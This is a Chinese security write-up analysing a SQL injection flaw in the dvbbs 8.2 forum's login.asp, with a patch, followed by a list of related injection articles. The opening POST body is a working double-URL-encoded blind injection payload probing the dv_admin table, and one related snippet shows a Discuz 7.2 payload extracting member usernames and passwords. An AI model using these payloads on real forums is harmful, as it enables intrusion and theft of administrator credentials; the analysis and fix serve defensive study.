dvbbs 8.2 SQL Injection注射漏洞分析
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可触发.
漏洞分析:动网在asp领域也算一个比较元老的程序,这次在8.2新版里有一个低级的错误.漏洞代码在login.asp 118行左右
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交'过去了.
修补方案:修补也很简单,将上述代码改成
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username)))
......
相关推荐
-
dvbbs 8.2 SQL Injection注射漏洞分析
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2
-
用PHP函数解决SQL injection
SQL injection问题在ASP上可是闹得沸沸扬扬当然还有不少国内外著名的PHP程序"遇难".至于SQL injection的详情,网上的文章太多了,在此就不作介绍.如果你网站空间的php.ini文件里的magic_quotes_gpc设成了off,那么PHP就不会在敏感字符前加上反斜杠(\),由于表单提交的内容可能含有敏感字符,如单引号('),就导致了SQL injection的漏洞.在这种情况下,我们可以用addslashes()来解决问题,它会自动在敏感字符前添加反斜杠.
-
SQL Injection with MySQL 注入分析
声明 本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有代码均为本人所写,所有数据均经过测试.绝对真实.如果有什么遗漏或错误,欢迎来安全天使论坛和我交流. 前言 2003年开始,喜欢脚本攻击的人越来越多,而且研究ASP下注入的朋友也逐渐多了起来,我看过最早的关于SQL注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯青了,国内才开始注意这个技术,由此看来,国内的这方面的技术相对于国外还是有一段很大差距,话说回来,大家对SQL注入攻击也相当熟悉了,国内各大站点都有些堪称
-
Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
一.概述 漏洞介绍: http://coolersky.com/leak/programme/bbs/2006/0515/515.html 前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看: http://www.eviloctal.com/forum/read.php?tid=22074 本站转贴为: http://coolersky.com/articles/hack/analysis/progra
-
Discuz7.2版的faq.php SQL注入漏洞分析
注入代码实例: 复制代码 代码如下: http://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_sch
-
Web网络安全漏洞分析SQL注入原理详解
目录 一.SQL注入的基础 1.1 介绍SQL注入 1.2 注入的原理 1.3 与MySQL注入相关的知识 MySQL查询语句 limit的用法 需要记住的几个函数 注释符 内联注释 一.SQL注入的基础 1.1 介绍SQL注入 SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作. 下面以PHP语句为例. $query = "SELECT * FROM users WH
-
php SQL Injection with MySQL
前言 2003年开始,喜欢脚本攻击的人越来越多,而且研究ASP下注入的朋友也逐渐多了起来,我看过最早的关于SQL注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯青了,国内才开始注意这个技术,由此看来,国内的这方面的技术相对于国外还是有一段很大差距,话说回来,大家对SQL注入攻击也相当熟悉了,国内各大站点都有些堪称经典的作品,不过作为一篇完整的文章,我觉得还是有必要再说说其定义和原理.如果哪位高手已经达到炉火纯青的地步,不妨给本文挑点刺.权当指点小弟. 关于php+Mysql的注入 国
-
Advanced SQL Injection with MySQL
文/图 安全天使·angel[BST] 前言 我的<SQL Injection with MySQL>(<黑客防线>7月的专题)已经对MySQL的注入有了比较全面的介绍了,但是有一个危害相当大的函数,我并没有在文中提及,因为如果能灵活应用这个函数,那PHP甚至服务器的安全性均会大打折扣,由于<SQL Injection with MySQL>的发表时间是在暑假期间,考虑到很多新手.学生和品德败坏的人乱用,所以我并没有把这个写在该文里,其实本文在5月初已写完.专题发表后,
-
三步堵死 SQL Server注入漏洞
SQL注入是什么? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患.用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入. 网站的恶梦――SQL注入 SQL注入通过网页对网站数据库进行修改.它能够直接在数据库中添加具有管理员权限的用户,从而最终获得系统管理员权限.黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种
-
PHP序列化/对象注入漏洞分析
本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell. 如果你想自行测试这个漏洞,你可以通过 XVWA 和 Kevgir 进行操作. 漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化.为了辅助测试,我们使用了Burpsuite的SuperSerial插件,下载地址在 这里 .它会被动检测PHP和Java序列化的存在. 分析 我们检测到了应用里使用了PHP序列化,所以我们可以开始确认应用代码里是否含有远程代码执行漏洞.需要注意的是,序列化对象是从参数"r
随机推荐
- python在windows下实现备份程序实例
- c#连接access数据库操作类分享
- js函数调用常用方法详解
- PHP脚本数据库功能详解(中)
- C#不可变类型深入解析
- 用javascript获取当页面上鼠标光标位置和触发事件的对象的代码
- win7 64位系统JDK安装配置环境变量教程
- window.open的功能全解析
- node.js学习之断言assert的使用示例
- php实现读取超大文件的方法
- 修改注册表找回消失的Word 2000菜单栏
- 剖析网站遭遇的黑客的三次入侵
- Java设计模式编程中简单工厂与抽象工厂模式的使用实例
- Linux文件管理使用详解
- 简单解决微信文章图片防盗链问题
- 创建无限极分类树型结构的简单方法
- Python实现的堆排序算法原理与用法实例分析
- 详解PANDAS 数据合并与重塑(join/merge篇)
- python实现键盘输入的实操方法
- Kotlin的枚举与异常示例详解